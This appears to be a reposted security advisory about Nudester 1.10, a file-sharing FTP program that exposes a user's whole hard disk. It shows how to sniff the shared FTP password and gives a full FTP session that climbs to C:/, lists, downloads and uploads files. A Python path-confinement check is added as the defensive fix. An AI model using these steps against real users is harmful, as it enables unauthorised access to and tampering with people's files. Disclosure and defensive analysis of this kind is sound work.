Welcome To Security.Fx-Vista.Com

Computer Security Information

Nudester 1.10 shares whole hard disk

COMMAND
    Nudester
SYSTEMS AFFECTED
    Nudester 1.10
PROBLEM
    The following is based on Real Security Advisory #1 by Cyph3r.
    Nudester, a file sharing program for porn, uses the FTP protocol
    to transfer files. The problem is that it gives access to the whole
    hard disk instead of just the folder containing porn.
    For example, open Nudester and a sniffer program (like Iris), then
    download a file from a user on Nudester while the sniffer is running
    with its filter including port 21, so you can capture the password.
        <Sniffed Data>
        
        220 ICS FTP Server ready
        user NUDESTER
        331 Password required for NUDESTER
        pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
        230 User NUDESTER logged in
        
        </Sniffed Data>

    Open an FTP client and connect to the IP:
        
        ftp> open ***.***.***.***
        Connected to ***.***.***.***
        220 ICS FTP Server ready.
        User (***.***.***.***:(none)): NUDESTER
        331 Password required for NUDESTER.
        Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
        230 User NUDESTER logged in.
        
        - Bingo!
        
        ftp> dir
        200 Port command successful.
        150 Opening data connection for directory list.
        C:\TEMP\*.* not found
        226 File sent ok
        ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
        ftp> cd ..
        250 CWD command successful. "C:/" is current directory.
        ftp> DIR
        200 Port command successful.
        150 Opening data connection for directory list.
        -rw-rw-rw-   1 ftp      ftp         1152 Oct 30  2000 FRUNLOG.TXT
        -rwxrwxrwx   1 ftp      ftp        25473 May 15  1998 MSCDEX.EXE
        -rw-rw-rw-   1 ftp      ftp        10604 May 15  1997 CDROM.SYS
        -rwxrwxrwx   1 ftp      ftp        20135 May 15  1998 KEYB.COM
        -rw-rw-rw-   1 ftp      ftp        34566 May 15  1998 KEYBOARD.SYS
        -rwxrwxrwx   1 ftp      ftp        71102 May 15  1998 EDIT.COM
        -rw-rw-rw-   1 ftp      ftp           38 Oct 16  1998 AUTOEXEC.OLD
        -rw-rw-rw-   1 ftp      ftp           31 Oct 16  1998 CONFIG.OLD
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 ATI
        -rw-rw-rw-   1 ftp      ftp          121 Oct 29  2000 CONFIG.DOS
        -rw-rw-rw-   1 ftp      ftp          113 Oct 29  2000 AUTOEXEC.DOS
        -rw-rw-rw-   1 ftp      ftp          436 Nov 18  2000 AUTOEXEC.BAK
        drw-rw-rw-   1 ftp      ftp            0 Oct 29  2000 WINDOWS
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2000 WINDOWS.000
        -rw-rw-rw-   1 ftp      ftp         7471 Nov 18  2000 NETLOG.TXT
        -rw-rw-rw-   1 ftp      ftp          172 Nov 15  2000 CONFIG.BAK
        -rw-rw-rw-   1 ftp      ftp         5048 Nov 17  2000 SETUPXLG.TXT
        -rwxrwxrwx   1 ftp      ftp          438 Aug 16 00:43 AUTOEXEC.BAT
        dr--r--r--   1 ftp      ftp            0 Oct 29  2000 Program Files
        -rw-rw-rw-   1 ftp      ftp          172 Nov 18  2000 CONFIG.SYS
        -rw-rw-rw-   1 ftp      ftp        19622 Aug 10 18:50 SCANDISK.LOG
        -rw-rw-rw-   1 ftp      ftp          327 Oct 30  2030 outreg.txt
        -rw-rw-rw-   1 ftp      ftp          339 Oct 30  2030 outreg.ini
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 dcpt
        -rwxrwxrwx   1 ftp      ftp        17129 Oct 30  2030 BOOTDISK.EXE
        -rwxrwxrwx   1 ftp      ftp      2884286 Oct 30  2030 DECOMP.EXE
        -rwxrwxrwx   1 ftp      ftp       265420 Oct 30  2030 DOS4GW.EXE
        -rw-rw-rw-   1 ftp      ftp          507 Oct 30  2030 FILE_ID.DIZ
        -rw-rw-rw-   1 ftp      ftp         2086 Oct 30  2030 HELPME.DOC
        -rw-rw-rw-   1 ftp      ftp         3639 Oct 30  2030 LICENSE.DOC
        -rw-rw-rw-   1 ftp      ftp         1377 Oct 30  2030 ORDER.DOC
        drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 KPCMS
        -rw-rw-rw-   1 ftp      ftp          386 Nov 02  2000 AUTOEXEC.001
        drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 psfonts
        -rw-rw-rw-   1 ftp      ftp           25 Nov 03  2000 prompt
        -rwxrwxrwx   1 ftp      ftp        95874 May 05  1999 COMMAND.COM
        drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Winzip
        drw-rw-rw-   1 ftp      ftp            0 Dec 10  2000 unzipped
        drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Antivirus
        drw-rw-rw-   1 ftp      ftp            0 Dec 16  2000 My Music
        -rw-rw-rw-   1 ftp      ftp          118 Jan 20 00:27 netsig.txt
        drw-rw-rw-   1 ftp      ftp            0 Mar 15 21:05 accelerator
        -rw-rw-rw-   1 ftp      ftp        22721 Aug 17 01:00 winzip.log
        226 File sent ok
        ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
    Let's see if we have access to download a file:
        ftp> get netsig.txt
        200 Port command successful.
        150 Opening data connection for netsig.txt.
        226 File sent ok
        ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
    Yep, let's try to upload a file:
        ftp> put c:\temp.txt
        200 Port command successful.
        150 Opening data connection for TEMP.TXT.
        226 File received ok
    Anyone can gain full access to a Nudester user's files; the
    username is the same for every user. However, the password is not
    the same; you will have to sniff while downloading a file to
    retrieve the password.
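    The transcript shows "cd .." from C:\TEMP being accepted and the
    session landing in C:/. The following is an added example, not code
    from the advisory or from Nudester, of the confinement check a
    file-sharing FTP server needs before honouring a client path. The
    names resolve_in_share, OutsideShare and replay are hypothetical, and
    treating C:\TEMP as the shared folder is an assumption taken from the
    transcript's starting directory.

```python
import ntpath  # Windows path rules, usable on any host OS


class OutsideShare(Exception):
    """A client-supplied path resolved outside the shared folder."""


def resolve_in_share(share_root, cwd, arg):
    """Resolve an FTP path argument (CWD/RETR/STOR) against the session's
    current directory; return it only if it stays under share_root."""
    root = ntpath.normcase(ntpath.normpath(share_root))
    # Clients may send '/' separators; normpath converts them and folds '..'
    candidate = ntpath.normpath(ntpath.join(cwd, arg))
    probe = ntpath.normcase(candidate)  # Windows paths are case-insensitive
    # Compare whole components, not string prefixes: C:\TEMP2 is not in C:\TEMP
    try:
        inside = ntpath.commonpath([root, probe]) == root
    except ValueError:  # another drive or a UNC path
        inside = False
    if not inside:
        raise OutsideShare(f"{arg!r} resolves to {candidate!r}")
    return candidate


def replay(share_root, args):
    """Apply each argument as a CWD, starting in share_root.
    Returns (argument, FTP reply code, directory after the command)."""
    cwd, out = share_root, []
    for arg in args:
        try:
            cwd = resolve_in_share(share_root, cwd, arg)
            out.append((arg, "250", cwd))
        except OutsideShare:
            out.append((arg, "550", cwd))  # refuse and stay put
    return out


if __name__ == "__main__":
    # Constructed inputs: the transcript's "cd .." plus other escape forms
    for row in replay("C:\\TEMP", ["..", "pics", "../../WINDOWS", "/", "D:\\"]):
        print(row)
```

    The check is lexical only; a server should also resolve links and
    junctions on the real filesystem before opening the file.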
SOLUTION
    The only solution to this problem is not to use Nudester.
Credits
-- UnKnown --


Copyright ©2008 www.Security.Fx-Vista.Com | All rights reserved